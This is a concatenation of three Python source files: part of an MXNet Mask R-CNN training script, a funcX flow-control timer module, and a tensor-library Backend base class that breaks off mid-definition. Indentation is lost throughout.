rpn_score = rpn_score.squeeze(axis=-1)
num_rpn_pos = (rpn_cls_targets >= 0).sum()
rpn_loss1 = self.rpn_cls_loss(rpn_score, rpn_cls_targets,
rpn_cls_targets >= 0) * rpn_cls_targets.size / num_rpn_pos
rpn_loss2 = self.rpn_box_loss(rpn_box, rpn_box_targets,
rpn_box_masks) * rpn_box.size / num_rpn_pos
# rpn overall loss, use sum rather than average
rpn_loss = rpn_loss1 + rpn_loss2
# losses of rcnn
num_rcnn_pos = (cls_targets >= 0).sum()
rcnn_loss1 = self.rcnn_cls_loss(cls_pred, cls_targets,
cls_targets.expand_dims(-1) >= 0) * cls_targets.size / \
num_rcnn_pos
rcnn_loss2 = self.rcnn_box_loss(box_pred, box_targets, box_masks) * box_pred.size / \
num_rcnn_pos
rcnn_loss = rcnn_loss1 + rcnn_loss2
# generate targets for mask
roi = mx.nd.concat(
*[mx.nd.take(roi[i], indices[i]) for i in range(indices.shape[0])], dim=0) \
.reshape((indices.shape[0], -1, 4))
m_cls_targets = mx.nd.concat(
*[mx.nd.take(cls_targets[i], indices[i]) for i in range(indices.shape[0])], dim=0) \
.reshape((indices.shape[0], -1))
matches = mx.nd.concat(
*[mx.nd.take(matches[i], indices[i]) for i in range(indices.shape[0])], dim=0) \
.reshape((indices.shape[0], -1))
mask_targets, mask_masks = self.net.mask_target(roi, gt_mask, matches, m_cls_targets)
# loss of mask
mask_loss = self.rcnn_mask_loss(mask_pred, mask_targets, mask_masks) * \
mask_targets.size / mask_masks.sum()
# overall losses
total_loss = rpn_loss.sum() + rcnn_loss.sum() + mask_loss.sum()
rpn_loss1_metric = rpn_loss1.mean()
rpn_loss2_metric = rpn_loss2.mean()
rcnn_loss1_metric = rcnn_loss1.sum()
rcnn_loss2_metric = rcnn_loss2.sum()
mask_loss_metric = mask_loss.sum()
rpn_acc_metric = [[rpn_cls_targets, rpn_cls_targets >= 0], [rpn_score]]
rpn_l1_loss_metric = [[rpn_box_targets, rpn_box_masks], [rpn_box]]
rcnn_acc_metric = [[cls_targets], [cls_pred]]
rcnn_l1_loss_metric = [[box_targets, box_masks], [box_pred]]
rcnn_mask_metric = [[mask_targets, mask_masks], [mask_pred]]
rcnn_fgmask_metric = [[mask_targets, mask_masks], [mask_pred]]
if args.amp:
with amp.scale_loss(total_loss, self._optimizer) as scaled_losses:
autograd.backward(scaled_losses)
else:
total_loss.backward()
return rpn_loss1_metric, rpn_loss2_metric, rcnn_loss1_metric, rcnn_loss2_metric, \
mask_loss_metric, rpn_acc_metric, rpn_l1_loss_metric, rcnn_acc_metric, \
rcnn_l1_loss_metric, rcnn_mask_metric, rcnn_fgmask_metric
def train(net, train_data, val_data, eval_metric, batch_size, ctx, logger, args):
"""Training pipeline"""
args.kv_store = 'device' if (args.amp and 'nccl' in args.kv_store) else args.kv_store
kv = mx.kvstore.create(args.kv_store)
net.collect_params().setattr('grad_req', 'null')
net.collect_train_params().setattr('grad_req', 'write')
for k, v in net.collect_params('.*bias').items():
v.wd_mult = 0.0
optimizer_params = {'learning_rate': args.lr, 'wd': args.wd, 'momentum': args.momentum, }
if args.clip_gradient > 0.0:
optimizer_params['clip_gradient'] = args.clip_gradient
if args.amp:
optimizer_params['multi_precision'] = True
if args.horovod:
hvd.broadcast_parameters(net.collect_params(), root_rank=0)
trainer = hvd.DistributedTrainer(
net.collect_train_params(), # fix batchnorm, fix first stage, etc...
'sgd',
optimizer_params
)
else:
trainer = gluon.Trainer(
net.collect_train_params(), # fix batchnorm, fix first stage, etc...
'sgd',
optimizer_params,
update_on_kvstore=(False if args.amp else None),
kvstore=kv)
if args.amp:
amp.init_trainer(trainer)
# lr decay policy
lr_decay = float(args.lr_decay)
lr_steps = sorted([float(ls) for ls in args.lr_decay_epoch.split(',') if ls.strip()])
lr_warmup = float(args.lr_warmup) # avoid int division
rpn_cls_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)
rpn_box_loss = mx.gluon.loss.HuberLoss(rho=args.rpn_smoothl1_rho) # == smoothl1
rcnn_cls_loss = mx.gluon.loss.SoftmaxCrossEntropyLoss()
rcnn_box_loss = mx.gluon.loss.HuberLoss(rho=args.rcnn_smoothl1_rho) # == smoothl1
rcnn_mask_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)
metrics = [mx.metric.Loss('RPN_Conf'),
mx.metric.Loss('RPN_SmoothL1'),
mx.metric.Loss('RCNN_CrossEntropy'),
mx.metric.Loss('RCNN_SmoothL1'),
mx.metric.Loss('RCNN_Mask')]
rpn_acc_metric = RPNAccMetric()
rpn_bbox_metric = RPNL1LossMetric()
rcnn_acc_metric = RCNNAccMetric()
rcnn_bbox_metric = RCNNL1LossMetric()
rcnn_mask_metric = MaskAccMetric()
rcnn_fgmask_metric = MaskFGAccMetric()
metrics2 = [rpn_acc_metric, rpn_bbox_metric,
rcnn_acc_metric, rcnn_bbox_metric,
rcnn_mask_metric, rcnn_fgmask_metric]
async_eval_processes = []
logger.info(args)
if args.verbose:
logger.info('Trainable parameters:')
logger.info(net.collect_train_params().keys())
logger.info('Start training from [Epoch {}]'.format(args.start_epoch))
best_map = [0]
base_lr = trainer.learning_rate
rcnn_task = ForwardBackwardTask(net, trainer, rpn_cls_loss, rpn_box_loss, rcnn_cls_loss,
rcnn_box_loss, rcnn_mask_loss)
executor = Parallel(args.executor_threads, rcnn_task) if not args.horovod else None
for epoch in range(args.start_epoch, args.epochs):
if not args.disable_hybridization:
net.hybridize(static_alloc=args.static_alloc)
while lr_steps and epoch >= lr_steps[0]:
new_lr = trainer.learning_rate * lr_decay
lr_steps.pop(0)
trainer.set_learning_rate(new_lr)
logger.info("[Epoch {}] Set learning rate to {}".format(epoch, new_lr))
for metric in metrics:
metric.reset()
tic = time.time()
btic = time.time()
train_data_iter = iter(train_data)
next_data_batch = next(train_data_iter)
next_data_batch = split_and_load(next_data_batch, ctx_list=ctx)
for i in range(len(train_data)):
batch = next_data_batch
if i + epoch * len(train_data) <= lr_warmup:
# adjust based on real percentage
new_lr = base_lr * get_lr_at_iter((i + epoch * len(train_data)) / lr_warmup,
args.lr_warmup_factor)
if new_lr != trainer.learning_rate:
if i % args.log_interval == 0:
logger.info('[Epoch {} Iteration {}] Set learning rate to {}'
.format(epoch, i, new_lr))
trainer.set_learning_rate(new_lr)
metric_losses = [[] for _ in metrics]
add_losses = [[] for _ in metrics2]
if executor is not None:
for data in zip(*batch):
executor.put(data)
for j in range(len(ctx)):
if executor is not None:
result = executor.get()
else:
result = rcnn_task.forward_backward(list(zip(*batch))[0])
if (not args.horovod) or hvd.rank() == 0:
for k in range(len(metric_losses)):
metric_losses[k].append(result[k])
for k in range(len(add_losses)):
add_losses[k].append(result[len(metric_losses) + k])
try:
# prefetch next batch
next_data_batch = next(train_data_iter)
next_data_batch = split_and_load(next_data_batch, ctx_list=ctx)
except StopIteration:
pass
for metric, record in zip(metrics, metric_losses):
metric.update(0, record)
for metric, records in zip(metrics2, add_losses):
for pred in records:
metric.update(pred[0], pred[1])
trainer.step(batch_size)
if (not args.horovod or hvd.rank() == 0) and args.log_interval \
and not (i + 1) % args.log_interval:
msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in metrics + metrics2])
logger.info('[Epoch {}][Batch {}], Speed: {:.3f} samples/sec, {}'.format(
epoch, i, args.log_interval * args.batch_size / (time.time() - btic), msg))
btic = time.time()
# validate and save params
if (not args.horovod) or hvd.rank() == 0:
msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in metrics])
logger.info('[Epoch {}] Training cost: {:.3f}, {}'.format(
epoch, (time.time() - tic), msg))
if not (epoch + 1) % args.val_interval:
# consider reducing the frequency of validation to save time
validate(net, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map,
args)
elif (not args.horovod) or hvd.rank() == 0:
current_map = 0.
save_params(net, logger, best_map, current_map, epoch, args.save_interval,
args.save_prefix)
for eval_process in async_eval_processes:
eval_process.join()
if __name__ == '__main__':
args = parse_args()
# fix seed for mxnet, numpy and python builtin random generator.
gutils.random.seed(args.seed)
if args.amp:
amp.init()
# training contexts
if args.horovod:
ctx = [mx.gpu(hvd.local_rank())]
else:
ctx = [mx.gpu(int(i)) for i in args.gpus.split(',') if i.strip()]
ctx = ctx if ctx else [mx.cpu()]
# network
kwargs = {}
module_list = []
if args.use_fpn:
module_list.append('fpn')
if args.norm_layer is not None:
module_list.append(args.norm_layer)
if args.norm_layer == 'bn':
kwargs['num_devices'] = len(ctx)
num_gpus = hvd.size() if args.horovod else len(ctx)
net_name = '_'.join(('mask_rcnn', *module_list, args.network, args.dataset))
if args.custom_model:
args.use_fpn = True
net_name = '_'.join(('mask_rcnn_fpn', args.network, args.dataset))
if args.norm_layer == 'bn':
norm_layer = gluon.contrib.nn.SyncBatchNorm
norm_kwargs = {'num_devices': len(ctx)}
sym_norm_layer = mx.sym.contrib.SyncBatchNorm
sym_norm_kwargs = {'ndev': len(ctx)}
elif args.norm_layer == 'gn':
norm_layer = gluon.nn.GroupNorm
norm_kwargs = {'groups': 8}
sym_norm_layer = mx.sym.GroupNorm
sym_norm_kwargs = {'groups': 8}
else:
norm_layer = gluon.nn.BatchNorm
norm_kwargs = None
sym_norm_layer = None
sym_norm_kwargs = None
if args.dataset == 'coco':
classes = COCODetection.CLASSES
else:
# default to VOC
classes = VOCDetection.CLASSES
net = get_model('custom_mask_rcnn_fpn', classes=classes, transfer=None,
dataset=args.dataset, pretrained_base=not args.no_pretrained_base,
base_network_name=args.network, norm_layer=norm_layer,
norm_kwargs=norm_kwargs, sym_norm_kwargs=sym_norm_kwargs,
num_fpn_filters=args.num_fpn_filters,
num_box_head_conv=args.num_box_head_conv,
num_box_head_conv_filters=args.num_box_head_conv_filters,
num_box_head_dense_filters=args.num_box_head_dense_filters,
short=args.image_short, max_size=args.image_max_size, min_stage=2,
max_stage=6, nms_thresh=args.nms_thresh, nms_topk=args.nms_topk,
post_nms=args.post_nms, roi_mode=args.roi_mode, roi_size=args.roi_size,
strides=args.strides, clip=args.clip, rpn_channel=args.rpn_channel,
base_size=args.anchor_base_size, scales=args.anchor_scales,
ratios=args.anchor_aspect_ratio, alloc_size=args.anchor_alloc_size,
rpn_nms_thresh=args.rpn_nms_thresh,
rpn_train_pre_nms=args.rpn_train_pre_nms,
rpn_train_post_nms=args.rpn_train_post_nms,
rpn_test_pre_nms=args.rpn_test_pre_nms,
rpn_test_post_nms=args.rpn_test_post_nms, rpn_min_size=args.rpn_min_size,
per_device_batch_size=args.batch_size // num_gpus,
num_sample=args.rcnn_num_samples, pos_iou_thresh=args.rcnn_pos_iou_thresh,
pos_ratio=args.rcnn_pos_ratio, max_num_gt=args.max_num_gt,
target_roi_scale=args.target_roi_scale,
num_fcn_convs=args.num_mask_head_convs)
else:
net = get_model(net_name, pretrained_base=True,
per_device_batch_size=args.batch_size // num_gpus, **kwargs)
args.save_prefix += net_name
if args.resume.strip():
net.load_parameters(args.resume.strip())
else:
for param in net.collect_params().values():
if param._data is not None:
continue
param.initialize()
net.collect_params().reset_ctx(ctx)
if args.amp:
# Cast both weights and gradients to 'float16'
net.cast('float16')
# These layers don't support 'float16'
net.collect_params('.*batchnorm.*').setattr('dtype', 'float32')
net.collect_params('.*normalizedperclassboxcenterencoder.*').setattr('dtype', 'float32')
# set up logger
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
log_file_path = args.save_prefix + '_train.log'
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(log_file_path)
logger.addHandler(fh)
if MPI is None and args.horovod:
logger.warning('mpi4py is not installed, validation result may be incorrect.')
# training data
train_dataset, val_dataset, eval_metric = get_dataset(args.dataset, args)
batch_size = args.batch_size // num_gpus if args.horovod else args.batch_size
train_data, val_data = get_dataloader(
net, train_dataset, val_dataset, MaskRCNNDefaultTrainTransform, MaskRCNNDefaultValTransform,
batch_size, len(ctx), args)
# training
train(net, train_data, val_data, eval_metric, batch_size, ctx, logger, args)
|
base.py
|
import sys
import threading
import logging
import time
logger = logging.getLogger("interchange.strategy.base")
class BaseStrategy(object):
"""Implements threshold-interval based flow control.
The overall goal is to trap the flow of apps from the
workflow, measure it and redirect it to the appropriate executors for
processing.
This is based on the following logic:
.. code-block:: none
BEGIN (INTERVAL, THRESHOLD, callback) :
start = current_time()
while (current_time()-start < INTERVAL) :
count = get_events_since(start)
if count >= THRESHOLD :
break
callback()
This logic ensures that the callbacks are activated with a maximum delay
of `interval` for systems with infrequent events as well as systems which would
generate large bursts of events.
Once a callback is triggered, the callback generally runs a strategy
method on the available sites as well as the task queue.
TODO: When the debug logs are enabled this module emits duplicate messages.
This issue needs more debugging. What I've learnt so far is that the duplicate
messages are present only when the timer thread is started, so this could be
from a duplicate logger being added by the thread.
"""
def __init__(self, *args, threshold=20, interval=5):
"""Initialize the flowcontrol object.
We start the timer thread here
Parameters
----------
- threshold (int) : Tasks after which the callback is triggered
- interval (int) : seconds after which timer expires
"""
self.interchange = None
self.threshold = threshold
self.interval = interval
self.cb_args = args
self.callback = self.strategize
self._handle = None
self._event_count = 0
self._event_buffer = []
self._wake_up_time = time.time() + 1
self._kill_event = threading.Event()
self._thread = threading.Thread(target=self._wake_up_timer, args=(self._kill_event,))
self._thread.daemon = True
def start(self, interchange):
"""Actually start the strategy
Parameters
----------
interchange: funcx.executors.high_throughput.interchange.Interchange
Interchange to bind the strategy to
"""
self.interchange = interchange
if hasattr(interchange.config, 'provider'):
logger.debug("Strategy bounds-> init:{}, min:{}, max:{}".format(
interchange.config.provider.init_blocks,
interchange.config.provider.min_blocks,
interchange.config.provider.max_blocks))
self._thread.start()
def strategize(self, *args, **kwargs):
""" Strategize is called everytime the threshold or the interval is hit
"""
logger.debug("Strategize called with {} {}".format(args, kwargs))
def _wake_up_timer(self, kill_event):
"""Internal. This is the function that the thread will execute.
waits on an event so that the thread can make a quick exit when close() is called
Args:
- kill_event (threading.Event) : Event to wait on
"""
while True:
prev = self._wake_up_time
# Waiting for the event returns True only when the event
# is set, usually by the parent thread
time_to_die = kill_event.wait(float(max(prev - time.time(), 0)))
if time_to_die:
return
if prev == self._wake_up_time:
self.make_callback(kind='timer')
else:
print("Sleeping a bit more")
def notify(self, event_id):
"""Let the FlowControl system know that there is an event.
This method is to be called from the Interchange to notify the flowcontrol
"""
self._event_buffer.extend([event_id])
self._event_count += 1
if self._event_count >= self.threshold:
logger.debug("Eventcount >= threshold")
self.make_callback(kind="event")
def make_callback(self, kind=None):
"""Makes the callback and resets the timer.
KWargs:
- kind (str): Default=None, used to pass information on what
triggered the callback
"""
self._wake_up_time = time.time() + self.interval
self.callback(tasks=self._event_buffer, kind=kind)
self._event_buffer = []
def close(self):
"""Merge the threads and terminate."""
self._kill_event.set()
self._thread.join()
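# Hedged usage sketch for BaseStrategy (the subclass name and the standalone use
# without an interchange are assumptions for illustration, not part of this module):
#
#     class CountingStrategy(BaseStrategy):
#         def strategize(self, *args, **kwargs):
#             logger.info("strategize called with %s %s", args, kwargs)
#
#     strategy = CountingStrategy(threshold=3, interval=10)
#     for event_id in range(3):
#         strategy.notify(event_id)  # the third notify() reaches the threshold
#                                    # and triggers make_callback(kind="event")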
class Timer(object):
"""This timer is a simplified version of the FlowControl timer.
This timer does not employ notify events.
This is based on the following logic :
.. code-block:: none
BEGIN (INTERVAL, THRESHOLD, callback) :
start = current_time()
while (current_time()-start < INTERVAL) :
wait()
break
callback()
"""
def __init__(self, callback, *args, interval=5):
"""Initialize the flowcontrol object
We start the timer thread here
Args:
- dfk (DataFlowKernel) : DFK object to track parsl progress
KWargs:
- threshold (int) : Tasks after which the callback is triggered
- interval (int) : seconds after which timer expires
"""
self.interval = interval
self.cb_args = args
self.callback = callback
self._wake_up_time = time.time() + 1
self._kill_event = threading.Event()
self._thread = threading.Thread(target=self._wake_up_timer, args=(self._kill_event,))
self._thread.daemon = True
self._thread.start()
def _wake_up_timer(self, kill_event):
"""Internal. This is the function that the thread will execute.
waits on an event so that the thread can make a quick exit when close() is called
Args:
- kill_event (threading.Event) : Event to wait on
"""
# Sleep till time to wake up
while True:
prev = self._wake_up_time
# Waiting for the event returns True only when the event
# is set, usually by the parent thread
time_to_die = kill_event.wait(float(max(prev - time.time(), 0)))
if time_to_die:
return
if prev == self._wake_up_time:
self.make_callback(kind='timer')
else:
print("Sleeping a bit more")
def make_callback(self, kind=None):
"""Makes the callback and resets the timer.
"""
self._wake_up_time = time.time() + self.interval
self.callback(*self.cb_args)
def close(self):
"""Merge the threads and terminate.
"""
self._kill_event.set()
self._thread.join()
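if __name__ == '__main__':
    # Minimal, self-contained demonstration of the Timer above (an illustrative
    # sketch, not part of the library API): print a message roughly every 2
    # seconds for ~5 seconds, then shut the timer thread down cleanly.
    def tick(label):
        print("timer fired:", label)

    demo_timer = Timer(tick, "demo", interval=2)
    time.sleep(5)
    demo_timer.close()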
|
_backend.py
|
import sys
import warnings
from collections import namedtuple
from contextlib import contextmanager
from threading import Barrier
from typing import List, Callable
import logging
import numpy
from ._dtype import DType, combine_types
PHI_LOGGER = logging.getLogger('phi')  # module-level logger used by the minimizers below; the name is an assumption
SolveResult = namedtuple('SolveResult', [
'method', 'x', 'residual', 'iterations', 'function_evaluations', 'converged', 'diverged', 'message',
])
class ComputeDevice:
"""
A physical device that can be selected to perform backend computations.
"""
def __init__(self, backend: 'Backend', name: str, device_type: str, memory: int, processor_count: int, description: str, ref=None):
self.name: str = name
""" Name of the compute device. CPUs are typically called `'CPU'`. """
self.device_type: str = device_type
""" Type of device such as `'CPU'`, `'GPU'` or `'TPU'`. """
self.memory: int = memory
""" Maximum memory of the device that can be allocated (in bytes). -1 for n/a. """
self.processor_count: int = processor_count
""" Number of CPU cores or GPU multiprocessors. -1 for n/a. """
self.description: str = description
""" Further information about the device such as driver version. """
self.ref = ref
""" (Optional) Reference to the internal device representation. """
self.backend: 'Backend' = backend
""" Backend that this device belongs to. Different backends represent the same device with different objects. """
def __repr__(self):
mem = f"{(self.memory / 1024 ** 2):.0f} MB" if self.memory > 0 else "memory: n/a"
pro = f"{self.processor_count} processors" if self.processor_count > 0 else "processors: n/a"
ref = f" '{self.ref}'" if isinstance(self.ref, str) else ""
descr = self.description.replace('\n', ' ')
if len(descr) > 30:
descr = descr[:28] + "..."
return f"{self.backend} device '{self.name}' ({self.device_type}{ref}) | {mem} | {pro} | {descr}"
class Backend:
def __init__(self, name: str, default_device: ComputeDevice):
"""
Backends delegate low-level operations to a compute library or emulate them.
The methods of `Backend` form a comprehensive list of available operations.
To support a compute library, subclass `Backend` and register it by adding it to `BACKENDS`.
Args:
name: Human-readable string
default_device: `ComputeDevice` being used by default
"""
self._name = name
self._default_device = default_device
def __enter__(self):
_DEFAULT.append(self)
def __exit__(self, exc_type, exc_val, exc_tb):
_DEFAULT.pop(-1)
@property
def name(self) -> str:
return self._name
def supports(self, feature: str or Callable) -> bool:
"""
Tests if this backend supports the given feature.
Features correspond to a method of this backend that must be implemented if the feature is supported.
Possible features:
* `sparse_coo_tensor`
* `functional_gradient`
Args:
feature: `str` or unbound Backend method, e.g. `Backend.sparse_coo_tensor`
Returns:
Whether the feature is supported.
"""
feature = feature if isinstance(feature, str) else feature.__name__
if not hasattr(Backend, feature):
raise ValueError(f"Not a valid feature: '{feature}'")
backend_fun = getattr(Backend, feature)
impl_fun = getattr(self.__class__, feature)
return impl_fun is not backend_fun
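# Example of the override check above (hypothetical subclass and methods): if a
# subclass `NumPyBackend(Backend)` overrides `sparse_coo_tensor` but not
# `to_dlpack`, then `backend.supports(Backend.sparse_coo_tensor)` is True while
# `backend.supports(Backend.to_dlpack)` is False, because the latter still
# resolves to the unimplemented base-class method.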
def prefers_channels_last(self) -> bool:
raise NotImplementedError()
@property
def precision(self) -> int:
""" Short for math.backend.get_precision() """
return get_precision()
@property
def float_type(self) -> DType:
return DType(float, self.precision)
@property
def as_registered(self) -> 'Backend':
from phi.math.backend import BACKENDS
for backend in BACKENDS:
if self.name in backend.name:
return backend
raise RuntimeError(f"Backend '{self}' is not visible.")
@property
def complex_type(self) -> DType:
return DType(complex, max(64, self.precision))
def combine_types(self, *dtypes: DType) -> DType:
return combine_types(*dtypes, fp_precision=self.precision)
def auto_cast(self, *tensors) -> list:
"""
Determines the appropriate value type resulting from operations involving the tensors as input.
This method is called by the default implementations of basic operators.
Backends can override this method to prevent unnecessary casting.
Args:
*tensors: tensors to cast and to consider when determining the common data type
Returns:
tensors cast to a common data type
"""
dtypes = [self.dtype(t) for t in tensors]
result_type = self.combine_types(*dtypes)
if result_type.kind in (int, float, complex, bool):
tensors = [self.cast(t, result_type) for t in tensors]
return tensors
def __str__(self):
return self.name
def __repr__(self):
return self.name
def list_devices(self, device_type: str or None = None) -> List[ComputeDevice]:
"""
Fetches information about all available compute devices this backend can use.
Implementations:
* NumPy: [`os.cpu_count`](https://docs.python.org/3/library/os.html#os.cpu_count)
* PyTorch: [`torch.cuda.get_device_properties`](https://pytorch.org/docs/stable/cuda.html#torch.cuda.get_device_properties)
* TensorFlow: `tensorflow.python.client.device_lib.list_local_devices`
* Jax: [`jax.devices`](https://jax.readthedocs.io/en/latest/jax.html#jax.devices)
See Also:
`Backend.set_default_device()`.
Args:
device_type: (optional) Return only devices of this type, e.g. `'GPU'` or `'CPU'`. See `ComputeDevice.device_type`.
Returns:
`list` of all currently available devices.
"""
raise NotImplementedError()
def get_default_device(self) -> ComputeDevice:
return self._default_device
def set_default_device(self, device: ComputeDevice or str) -> bool:
"""
Sets the device new tensors will be allocated on.
This function will do nothing if the target device type is not available.
See Also:
`Backend.list_devices()`, `Backend.get_default_device()`.
Args:
device: `ComputeDevice` or device type as `str`, such as `'CPU'` or `'GPU'`.
Returns:
`bool` whether the device was successfully set.
"""
if isinstance(device, str):
devices = self.list_devices(device)
if not devices:
warnings.warn(f"{self.name}: Cannot select '{device}' because no device of this type is available.", RuntimeWarning)
return False
device = devices[0]
assert device.backend is self, f"Cannot set default device to {device.name} for backend {self.name} because the device belongs to backend {device.backend.name}"
self._default_device = device
return True
def seed(self, seed: int):
raise NotImplementedError()
def is_module(self, obj) -> bool:
"""
Tests if `obj` is of a type that is specific to this backend, e.g. a neural network.
If `True`, this backend will be chosen for operations involving `obj`.
See Also:
`Backend.is_tensor()`.
Args:
obj: Object to test.
"""
raise NotImplementedError()
def is_tensor(self, x, only_native=False):
"""
An object is considered a native tensor by a backend if no internal conversion is required by backend methods.
An object is considered a tensor (native or otherwise) by a backend if it is not a struct (e.g. tuple, list) and all methods of the backend accept it as a tensor argument.
If `True`, this backend will be chosen for operations involving `x`.
See Also:
`Backend.is_module()`.
Args:
x: object to check
only_native: If True, only accepts true native tensor representations, not Python numbers or others that are also supported as tensors (Default value = False)
Returns:
bool: whether `x` is considered a tensor by this backend
"""
raise NotImplementedError()
def as_tensor(self, x, convert_external=True):
"""
Converts a tensor-like object to the native tensor representation of this backend.
If x is a native tensor of this backend, it is returned without modification.
If x is a Python number (numbers.Number instance), `convert_external` decides whether to convert it unless the backend cannot handle Python numbers.
*Note:* There may be objects that are considered tensors by this backend but are not native and thus, will be converted by this method.
Args:
x: tensor-like, e.g. list, tuple, Python number, tensor
convert_external: if False and `x` is a Python number that is understood by this backend, this method returns the number as-is. This can help prevent type clashes like int32 vs int64. (Default value = True)
Returns:
tensor representation of `x`
"""
raise NotImplementedError()
def is_available(self, tensor) -> bool:
"""
Tests if the value of the tensor is known and can be read at this point.
If true, `numpy(tensor)` must return a valid NumPy representation of the value.
Tensors are typically available when the backend operates in eager mode.
Args:
tensor: backend-compatible tensor
Returns:
bool
"""
raise NotImplementedError()
def numpy(self, tensor) -> numpy.ndarray:
"""
Returns a NumPy representation of the given tensor.
If `tensor` is already a NumPy array, it is returned without modification.
This method raises an error if the value of the tensor is not known at this point, e.g. because it represents a node in a graph.
Use `is_available(tensor)` to check if the value can be represented as a NumPy array.
Args:
tensor: backend-compatible tensor
Returns:
NumPy representation of the values stored in the tensor
"""
raise NotImplementedError()
def to_dlpack(self, tensor):
raise NotImplementedError()
def from_dlpack(self, capsule):
raise NotImplementedError()
def copy(self, tensor, only_mutable=False):
raise NotImplementedError()
def call(self, f: Callable, *args, name=None):
"""
Calls `f(*args)` and returns the result.
This method may be used to register internal calls with the profiler.
Usage:
choose_backend(key).call(custom_function, *args)
"""
return f(*args)
def block_until_ready(self, values):
pass
def jit_compile(self, f: Callable) -> Callable:
return NotImplemented
def functional_gradient(self, f: Callable, wrt: tuple or list, get_output: bool):
"""
Args:
f: Function to differentiate.
wrt: Argument indices for which to compute the gradient.
get_output: Whether the derivative function should return the output of `f` in addition to the gradient.
Returns:
A function `g` with the same arguments as `f`.
If `get_output=True`, `g` returns a `tuple` containing the outputs of `f` followed by the gradients.
"""
raise NotImplementedError(self)
def jacobian(self, f: Callable, wrt: tuple or list, get_output: bool):
raise NotImplementedError(self)
def hessian(self, f: Callable, wrt: tuple or list, get_output: bool, get_gradient: bool) -> tuple:
"""
First dimension of all inputs/outputs of `f` is assumed to be a batch dimension.
Element-wise Hessians will be computed along the batch dimension.
All other dimensions are parameter dimensions and will appear twice in the Hessian matrices.
Args:
f: Function whose first output is a scalar float or complex value.
wrt:
get_output:
get_gradient:
Returns:
Function returning `(f(x), g(x), H(x))` or less depending on `get_output` and `get_gradient`.
The result is always a `tuple` holding at most these three items.
"""
raise NotImplementedError(self)
def custom_gradient(self, f: Callable, gradient: Callable) -> Callable:
"""
Creates a function based on `f` that uses a custom gradient for backprop.
Args:
f: Forward function.
gradient: Function for backprop. Will be called as `gradient(*d_out)` to compute the gradient of `f`.
Returns:
Function with similar signature and return values as `f`. However, the returned function does not support keyword arguments.
"""
return NotImplemented
def jit_compile_grad(self, f, wrt: tuple or list, get_output: bool):
raise NotImplementedError()
def jit_compile_hessian(self, f, wrt: tuple or list, get_output: bool, get_gradient: bool):
raise NotImplementedError()
def transpose(self, tensor, axes):
raise NotImplementedError()
def random_uniform(self, shape, low, high, dtype: DType or None):
""" Float tensor of selected precision containing random values in the range [0, 1) """
raise NotImplementedError(self)
def random_normal(self, shape):
""" Float tensor of selected precision containing random values sampled from a normal distribution with mean 0 and std 1. """
raise NotImplementedError(self)
def stack(self, values, axis=0):
raise NotImplementedError(self)
def concat(self, values, axis):
raise NotImplementedError(self)
def pad(self, value, pad_width, mode: str = 'constant', constant_values=0):
"""
Pad a tensor with values as specified by `mode` and `constant_values`.
If the mode is not supported, returns NotImplemented.
Args:
value: tensor
pad_width: 2D tensor specifying the number of values padded to the edges of each axis in the form [[axis 0 lower, axis 0 upper], ...] including batch and component axes.
mode: One of 'constant', 'boundary', 'periodic', 'symmetric', 'reflect' (Default value = 'constant')
constant_values: used for out-of-bounds points if mode='constant' (Default value = 0)
Returns:
padded tensor or NotImplemented
"""
raise NotImplementedError(self)
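# Illustrative pad_width layout (values are assumptions, not defaults): for a
# tensor of shape (batch, y, x, channels), pad_width = [[0, 0], [1, 1], [2, 0], [0, 0]]
# pads one row above and below, two columns on the lower x side only, and leaves
# the batch and channel axes untouched.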
def reshape(self, value, shape):
raise NotImplementedError(self)
def flip(self, value, axes: tuple or list):
slices = tuple(slice(None, None, -1 if i in axes else None) for i in range(self.ndims(value)))
return value[slices]
def sum(self, value, axis=None, keepdims=False):
raise NotImplementedError(self)
def prod(self, value, axis=None):
raise NotImplementedError(self)
def divide_no_nan(self, x, y):
""" Computes x/y but returns 0 if y=0. """
raise NotImplementedError(self)
def where(self, condition, x=None, y=None):
raise NotImplementedError(self)
def nonzero(self, values):
"""
Args:
values: Tensor with only spatial dimensions
Returns:
non-zero multi-indices as tensor of shape (nnz, vector)
"""
raise NotImplementedError(self)
def mean(self, value, axis=None, keepdims=False):
raise NotImplementedError(self)
def range(self, start, limit=None, delta=1, dtype: DType = DType(int, 32)):
raise NotImplementedError(self)
def zeros(self, shape, dtype: DType = None):
raise NotImplementedError(self)
def zeros_like(self, tensor):
raise NotImplementedError(self)
def ones(self, shape, dtype: DType = None):
raise NotImplementedError(self)
def ones_like(self, tensor):
raise NotImplementedError(self)
def meshgrid(self, *coordinates):
raise NotImplementedError(self)
def linspace(self, start, stop, number):
raise NotImplementedError(self)
def tensordot(self, a, a_axes: tuple or list, b, b_axes: tuple or list):
""" Multiply-sum-reduce a_axes of a with b_axes of b. """
raise NotImplementedError(self)
def matmul(self, A, b):
raise NotImplementedError(self)
def einsum(self, equation, *tensors):
raise NotImplementedError(self)
def cumsum(self, x, axis: int):
raise NotImplementedError(self)
def while_loop(self, loop: Callable, values: tuple):
"""
```python
while any(values[0]):
values = loop(*values)
return values
```
This operation does not support backpropagation.
Args:
loop: Loop function, must return a `tuple` with entries equal to `values` in shape and data type.
values: Initial values of loop variables.
Returns:
Loop variables upon loop completion.
"""
raise NotImplementedError(self)
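# Concrete reading of the loop contract above (hypothetical values): with
# loop = lambda c, x: (c - 1, x + c) and values = (3, 0), the loop body runs
# while any(values[0]) holds, i.e. c goes 3 -> 2 -> 1 -> 0, and the final
# result is (0, 6).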
def abs(self, x):
raise NotImplementedError(self)
def sign(self, x):
raise NotImplementedError(self)
def round(self, x):
raise NotImplementedError(self)
def ceil(self, x):
raise NotImplementedError(self)
def floor(self, x):
raise NotImplementedError(self)
def max(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def min(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def maximum(self, a, b):
raise NotImplementedError(self)
def minimum(self, a, b):
raise NotImplementedError(self)
def clip(self, x, minimum, maximum):
raise NotImplementedError(self)
def sqrt(self, x):
raise NotImplementedError(self)
def exp(self, x):
raise NotImplementedError(self)
def conv(self, value, kernel, zero_padding=True):
